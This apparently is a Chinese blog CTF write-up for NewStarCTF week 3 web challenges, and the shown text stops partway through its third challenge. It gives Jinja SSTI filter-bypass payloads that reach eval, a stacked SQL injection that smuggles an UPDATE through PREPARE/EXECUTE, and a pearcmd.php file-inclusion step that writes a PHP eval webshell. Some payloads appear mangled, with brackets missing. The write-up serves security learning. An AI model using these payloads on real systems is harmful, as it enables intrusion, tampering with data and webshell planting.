<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 6.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" integrity="sha256-HtsXJanqjKTc8vVQjO4YMhiqFoXkfBsjBWcX91T1jr8=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"monkeyx1.github.io","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.17.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":true,"show_result":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"/search.json","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}}</script><script src="/js/config.js"></script>

    <meta name="description" content="WEBBabySSTI_One根据题目提示应该是SSTI模板注入，所以我们进行验证一下  1使用?name&#x3D;&amp;#123;&amp;#123;&amp;#x27;&amp;#x27;.class&amp;#125;&amp;#125;发现class被过滤了   123所以我们使用?name&#x3D;&amp;#123;&amp;#123;&amp;#x27;&amp;#x27;[&amp;#x27;cla&amp;#x27;+&amp;#x27;ss&amp;#x27;]&amp;#125;&amp;#125;进行绕过，然后">
<meta property="og:type" content="article">
<meta property="og:title" content="NewStarCTF 公开赛赛道 WEEK3 WP">
<meta property="og:url" content="https://monkeyx1.github.io/2022/10/14/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/index.html">
<meta property="og:site_name" content="柷澂">
<meta property="og:description" content="WEBBabySSTI_One根据题目提示应该是SSTI模板注入，所以我们进行验证一下  1使用?name&#x3D;&amp;#123;&amp;#123;&amp;#x27;&amp;#x27;.class&amp;#125;&amp;#125;发现class被过滤了   123所以我们使用?name&#x3D;&amp;#123;&amp;#123;&amp;#x27;&amp;#x27;[&amp;#x27;cla&amp;#x27;+&amp;#x27;ss&amp;#x27;]&amp;#125;&amp;#125;进行绕过，然后">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-91.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-92.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-93.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-94.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-95.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-96.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-97.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-98.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-99.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-100.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-101.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-102.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-103.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-104.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-105.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-106.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-107.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-108.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-109.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-110.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-111.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-112.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-113.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-114.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-115.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-116.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-117.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-118.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-119.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-120.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-121.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-122.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-123.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-124.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-125.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-126.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-127.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-128.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-129.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-130.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-131.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-132.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-133.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-134.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-135.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-136.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-137.png">
<meta property="og:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-138.png">
<meta property="article:published_time" content="2022-10-14T14:14:45.000Z">
<meta property="article:modified_time" content="2024-07-27T17:31:00.684Z">
<meta property="article:author" content="柷澂">
<meta property="article:tag" content="比赛">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="web">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://monkeyx1.github.io/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-91.png">


<link rel="canonical" href="https://monkeyx1.github.io/2022/10/14/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://monkeyx1.github.io/2022/10/14/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/","path":"2022/10/14/NewStarCTF-公开赛赛道-WEEK3-WP/","title":"NewStarCTF 公开赛赛道 WEEK3 WP"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>NewStarCTF 公开赛赛道 WEEK3 WP | 柷澂</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">柷澂</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">欢迎来到柷澂的安全小窝</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#WEB"><span class="nav-number">1.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#BabySSTI-One"><span class="nav-number">1.0.1.</span> <span class="nav-text">BabySSTI_One</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#multiSQL"><span class="nav-number">1.0.2.</span> <span class="nav-text">multiSQL</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#IncludeTwo"><span class="nav-number">1.0.3.</span> <span class="nav-text">IncludeTwo</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Maybe-You-Have-To-think-More"><span class="nav-number">1.0.4.</span> <span class="nav-text">Maybe You Have To think More</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#MISC"><span class="nav-number">2.</span> <span class="nav-text">MISC</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#qsdz%E2%80%99s-girlfriend-3"><span class="nav-number">2.0.1.</span> <span class="nav-text">qsdz’s girlfriend 3</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8B%E9%9D%A2%E6%98%AF%E5%A4%8D%E7%8E%B0%E7%9A%84%E5%86%85%E5%AE%B9%EF%BC%9A"><span class="nav-number">3.</span> <span class="nav-text">下面是复现的内容：</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Whats-HTTP"><span class="nav-number">3.0.1.</span> <span class="nav-text">Whats HTTP</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#WebShell%EF%BC%81"><span class="nav-number">3.0.2.</span> <span class="nav-text">WebShell！</span></a></li></ol></li></ol></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="柷澂"
      src="/images/header.jpg">
  <p class="site-author-name" itemprop="name">柷澂</p>
  <div class="site-description" itemprop="description">心如明镜台，时时勤拂拭</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">43</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">18</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/monkeyx1" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;monkeyx1" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:647498949@qq.com" title="E-Mail → mailto:647498949@qq.com" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license animated" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="https://cdnjs.cloudflare.com/ajax/libs/creativecommons-vocabulary/2020.11.3/assets/license_badges/small/by_nc_sa.svg" alt="Creative Commons"></a>
  </div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://monkeyx1.github.io/2022/10/14/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/header.jpg">
      <meta itemprop="name" content="柷澂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="柷澂">
      <meta itemprop="description" content="心如明镜台，时时勤拂拭">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="NewStarCTF 公开赛赛道 WEEK3 WP | 柷澂">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          NewStarCTF 公开赛赛道 WEEK3 WP
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-10-14 22:14:45" itemprop="dateCreated datePublished" datetime="2022-10-14T22:14:45+08:00">2022-10-14</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2024-07-28 01:31:00" itemprop="dateModified" datetime="2024-07-28T01:31:00+08:00">2024-07-28</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/web%E5%AE%89%E5%85%A8%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">web安全学习</span></a>
        </span>
    </span>

  
    <span id="/2022/10/14/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/" class="post-meta-item leancloud_visitors" data-flag-title="NewStarCTF 公开赛赛道 WEEK3 WP" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
    <span class="post-meta-break"></span>
    <span class="post-meta-item" title="本文字数">
      <span class="post-meta-item-icon">
        <i class="far fa-file-word"></i>
      </span>
      <span class="post-meta-item-text">本文字数：</span>
      <span>3k</span>
    </span>
    <span class="post-meta-item" title="阅读时长">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">阅读时长 &asymp;</span>
      <span>3 分钟</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h4 id="BabySSTI-One"><a href="#BabySSTI-One" class="headerlink" title="BabySSTI_One"></a><strong>BabySSTI_One</strong></h4><p>根据题目提示应该是SSTI模板注入，所以我们进行验证一下</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-91.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用?name=&#123;&#123;&#x27;&#x27;.class&#125;&#125;发现class被过滤了</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-92.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">所以我们使用?name=&#123;&#123;&#x27;&#x27;[&#x27;cla&#x27;+&#x27;ss&#x27;]&#125;&#125;进行绕过，然后使用</span><br><span class="line"></span><br><span class="line">?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#125;&#125;可以得到object类</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-93.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#x27;__subcl&#x27;+&#x27;asses__&#x27;&#125;&#125;得到所有子</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-94.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">然后我们获取os._wrap_close类，使用</span><br><span class="line"></span><br><span class="line">?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#x27;__subcl&#x27;+&#x27;asses__&#x27;[117]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-95.png"><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-96.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#x27;__subcl&#x27;+&#x27;asses__&#x27;117[&#x27;glob&#x27;+&#x27;als&#x27;]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-97.png"></p>
<p>然后找到eval</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">使用的是?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#x27;__subcl&#x27;+&#x27;asses__&#x27;117&#x27;__glob&#x27;+&#x27;als__&#x27;[&#x27;eval&#x27;]&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-98.png"></p>
<p>然后我们使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#x27;__subcl&#x27;+&#x27;asses__&#x27;117&#x27;__glob&#x27;+&#x27;als__&#x27;&#x27;eval&#x27;&#125;&#125;可以执行命令，在根目录下发现了flag</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-99.png"></p>
<p>发现cat和flag都在黑名单中</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-100.png"></p>
<p>这里使用base编码绕过，因为base也在黑名单中，使用\进行转义</p>
<p>使用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?name=&#123;&#123;&#x27;&#x27;&#x27;__cla&#x27;+&#x27;ss__&#x27;&#x27;__subcl&#x27;+&#x27;asses__&#x27;117&#x27;__glob&#x27;+&#x27;als__&#x27;&#x27;eval&#x27;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-101.png"></p>
<p>之后看了一下其他师傅的wp，发现自己的思路可能存在一些问题，想的太复杂了……</p>
<h4 id="multiSQL"><a href="#multiSQL" class="headerlink" title="multiSQL"></a><strong>multiSQL</strong></h4><p>输入火华，发现回显的是他的成绩</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-102.png"></p>
<p>然后测试发现select、insert、union、update、updatexml都被过滤了，然后我们发现可以进行堆叠注入，所以我们使用%E7%81%AB%E5%8D%8E’;show<br>tables;#得到表名</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-103.png"></p>
<p>然后使用%E7%81%AB%E5%8D%8E’;show columns from score;#得到字段名</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-104.png"></p>
<p>因为要帮火华师傅修改成绩啊，所以我们要使用update，但是被过滤了，所以我们这样来修改后台数据，使用-1’;set @sql &#x3D;<br>CONCAT(‘up’,’date score set listen&#x3D;200’);prepare stmt from @sql;EXECUTE<br>stmt;#，最后点击验证成绩得到flag</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-105.png"></p>
<h4 id="IncludeTwo"><a href="#IncludeTwo" class="headerlink" title="IncludeTwo"></a>IncludeTwo</h4><p>题目给出了源码</p>
<p><img src="/images/NewStarCTF-%E5%85%AC%E5%BC%80%E8%B5%9B%E8%B5%9B%E9%81%93-WEEK3-WP/image-106.png"></p>
<p>但是filter伪协议被过滤了，提示是要getshell</p>
<p><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html">Docker PHP裸文件本地包含综述</a></p>
<p>这里是通过pearcmd.php来实现getshell的，使用burp进行抓包，参数改为<code>index.php?+config- create+/&amp;file=/usr/local/lib/php/pearcmd&amp;/&lt;?=eval($_REQUEST[8])?&gt;+/tmp/monkey.php</code></p>
